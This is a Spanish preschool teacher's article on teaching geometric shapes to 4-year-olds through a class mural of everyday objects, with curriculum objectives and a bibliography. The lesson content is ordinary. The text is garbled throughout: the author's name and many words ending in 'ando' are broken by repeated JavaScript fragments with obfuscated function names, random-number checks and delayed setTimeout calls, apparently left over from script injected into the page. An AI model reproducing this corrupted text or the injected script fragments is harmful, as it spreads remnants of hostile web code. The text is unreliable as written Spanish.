APRENDO LAS FORMAS

Autora: María Fernandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda Rodríguez Rodríguez

          En este artículo voy a exponer cómo trabajo con mis alumnos/as las formas de una manera motivadora y utilizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando los elementos del entorno más cercano. Para ello he contado con la colaboración de la familia. Con estas actividades pretendo que mis alumnos/as conozcan los elementos de su entorno, además de  desarrollar su pensamiento lógico – matemático.


 

 Desarrollo de la actividad:

         Estas actividades van dirigidas a los alumnos/as del segundo nivel del segundo ciclo de Educación Infantil, es decir, 4 años.

         Vamos a trabajar el área de Conocimiento del entorno.

          Se encuentra relacionada con el siguiente Objetivo general de área:

-         Iniciarse en las habilidades matemáticas manipulandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando funcionalmente elementos, identificandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando sus atributos y cualidades y estableciendo relaciones de agrupamientos, clasificación, orden y cuantificación.

         Bloque de contenido:

        Medio físico: Elementos, relaciones y medidas. Y dentro de este bloque vamos a trabajar los siguientes contenidos:


-         Formas, orientación y representación en el espacio.

-         Exploración sistemática de algunas figuras y cuerpos geométricos para descubrir sus propiedades y establecer relaciones.


        Y el área de los Lenguajes: Comunicación y Representación.

         Se encuentra relacionada con el siguiente Objetivo general de área:

-         Acercarse al conocimiento de obras artísticas expresadas en distintos lenguajes y realizar actividades de representación y expresión artística mediante el empleo de diversas técnicas.


 

Bloque de contenido:

        Lenguaje plástico. Y dentro de este bloque vamos a trabajar los siguientes contenidos:

-         Producción de elaboraciones plásticas para expresar hechos, sucesos, vivencias, fantasías y deseos.

 

Materiales necesarios:

-         Objetos de la vida cotidiana

-         Papel continúo

-         Lápiz

-         Celofán para pegar los objetos al papel continuo

 

Comienzan las actividades:

           Para saber los conocimientos previos que poseen mis alumnos/as sobre las formas geométricas que vamos a trabajar les realizaré una serie de preguntas:


-          ¿Qué figura geométrica es esta?

-          ¿Habéis visto algún objeto que tenga esta forma?

-          ¿Cómo se llaman?

-          …

        Seguidamente les explicaré que hay muchos objetos del entorno tienen forma de triángulo, otros de cuadrado y otros de círculo.

        A continuación les propuse a mis alumnos/as realizar un mural con objetos de uso cotidiano. Pero este mural solo estará compuesto por objetos que tenga forma de triángulo, de círculo y de cuadrado.

          En la asamblea cada niño/a nos mostraba el objeto que había traído de casa, nos decía para qué se utilizaba y qué forma tenía. Seguidamente lo dejaba en el rincón de lógico – matemática para que pudiera manejado por sus compañeros.

         Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando juntamos un número importante de objetos con forma de triángulo, de círculo y de cuadrado, realizamos entre todos el mural.


         En la parte de arriba del mural escribieron “FORMAS”. Cada niño/a pegaba con celofán en el mural los objetos que había traído, debajo del objeto escribía su nombre y la forma que tenía.

         Finalmente contamos cuantos objetos teníamos con forma triangular, cuantos con forma cuadrada y por último con forma circular.


 

Bibliografía:

  • -         Zabalza, M.A. Didáctica de la Educación Infantil. Ed. Narcea S.A. Madrid, 1987
  • -         Piaget, J. y Inchelder, B.: La psicología del niño. Editorial Morata. Madrid, 1984.
  • -         Lowenfeld, Víctor y Brittain, W. Desarrollo de la capacidad creadora.